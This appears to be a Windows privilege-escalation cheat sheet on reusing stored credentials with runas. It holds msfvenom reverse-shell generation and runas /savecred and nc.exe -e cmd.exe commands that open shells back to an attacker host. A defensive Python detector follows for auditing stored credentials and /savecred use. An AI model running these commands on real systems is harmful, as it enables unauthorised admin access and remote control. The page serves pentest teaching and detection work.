Run As

Runas allows us to run a program as a different user. It can be used with local or domain accounts, as long as the user has the ability to log on to the system.

cmdkey /list # List stored Creds on the machine
where runas.exe # Locate runas.exe, for use if we find or have the password

# Example stored creds:
Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator
# Generate the msfvenom payload and transfer it
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

# Using the above stored creds:
runas /savecred /user:<USER found from cmdkey command above> "shell.exe"

# Change path below; runas prompts for the password of <username> (it cannot be passed on the command line)
C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

# If the above doesn't work
runas /user:administrator cmd # Try this or below to get the reverse shell
runas /user:administrator "nc.exe -e cmd.exe <IP> 443"

# If the above doesn't work, try RunasCs
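
From the defender's side, both the stored credential and the /savecred invocation shown above can be audited. The following Python is an added example, not part of the original page: it parses cmdkey /list output for entries that runas /savecred can reuse and flags runas /savecred in process-creation command lines. The sample output, the command lines and the function names are constructed, and the Domain:interactive= filter is an assumption based on the sample output above.

```python
import re

# Constructed sample: `cmdkey /list` output in the format shown on this page.
SAMPLE_CMDKEY = r"""Currently stored credentials:
    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: builduser
"""

# Constructed sample: process-creation command lines (e.g. from 4688 or Sysmon 1 events).
SAMPLE_CMDLINES = [
    r'runas /savecred /user:WORKGROUP\Administrator "shell.exe"',
    r'C:\Windows\System32\runas.exe /user:svc_backup "mmc.exe"',
    r'"C:\Windows\System32\RUNAS.EXE" /SaveCred /user:admin cmd',
    r'notepad.exe C:\notes\runas-savecred.txt',
]

def parse_cmdkey(text):
    """Split `cmdkey /list` output into dicts with target/type/user keys."""
    entries, cur = [], {}
    for line in text.splitlines():
        m = re.match(r"\s*(Target|Type|User):\s*(.+?)\s*$", line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2)
        if key == "target" and cur:  # a new Target line starts a new entry
            entries.append(cur)
            cur = {}
        cur[key] = val
    if cur:
        entries.append(cur)
    return entries

def reusable_by_runas(entries):
    """Assumed filter: Domain Password entries with an interactive target."""
    return [e for e in entries
            if e.get("type", "").lower() == "domain password"
            and e.get("target", "").lower().startswith("domain:interactive=")]

# The image name must be runas(.exe), bare, with a full path, or quoted.
RUNAS_RE = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?runas(?:\.exe)?"?\s', re.I)

def flags_savecred(cmdline):
    """True when the process is runas and /savecred is one of its switches."""
    has_switch = re.search(r"(?<!\S)/savecred(?!\S)", cmdline, re.I) is not None
    return bool(RUNAS_RE.match(cmdline)) and has_switch
```

An entry flagged by reusable_by_runas can be removed on the host with cmdkey /delete:<target>.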
